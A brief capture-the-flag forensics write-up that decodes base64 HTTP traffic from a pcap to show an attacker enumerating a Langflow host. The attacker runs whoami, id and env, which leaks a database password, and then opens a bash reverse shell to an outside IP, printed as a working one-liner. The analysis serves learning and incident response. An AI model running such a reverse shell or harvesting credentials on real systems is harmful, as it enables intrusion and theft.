Watchtower of Mists

Personal Rating: Easy

The challenge starts off with a pcap file. The first thing I like to do with pcap files is to search for any plaintext traffic in Wireshark. HTTP traffic could be found and exhibited suspicious contents:

Decoding the base64 strings shows that the following commands were executed on the target host (with reply):

whoami
user

id
uid=1000(user) gid=0(root) groups=0(root)

env
TOKENIZERS_PARALLELISM=false
HOSTNAME=aisrv01
PYTHON_PIP_VERSION=24.0
HOME=/app/data
LANGFLOW_DATABASE_URL=postgresql://langflow:LnGFlWPassword2025@postgres:5432/langflow
LANGFLOW_HOST=0.0.0.0
GPG_KEY=7169605F62C751356D054A26A821E680E5FA6305
OPENAI_API_KEY=dummy
ASTRA_ASSISTANTS_QUIET=true
LANGFLOW_PORT=7860
LANGFLOW_CONFIG_DIR=app/langflow
PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/dbf0c85f76fb6e1ab42aa672ffca6f0a675d9ee4/public/get-pip.py
SERVER_SOFTWARE=gunicorn/23.0.0
GRPC_VERBOSITY=ERROR
PATH=/app/.venv/bin:/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
TIKTOKEN_CACHE_DIR=/app/.venv/lib/python3.12/site-packages/litellm/litellm_core_utils/tokenizers
LANG=C.UTF-8
PYTHON_VERSION=3.12.3
PWD=/app
PYTHON_GET_PIP_SHA256=dfe9fd5c28dc98b5ac17979a953ea550cec37ae1b47a5116007395bfacff2ab9
USER_AGENT=langflow

sh -i >& /dev/tcp/131.0.72.0/7852 0>&1

This shows basic enumeration was done on the target, followed by the execution of a bash reverse shell.

PreviousWhispers of the Moonbeam NextRusted Oracle

Last updated 22 hours ago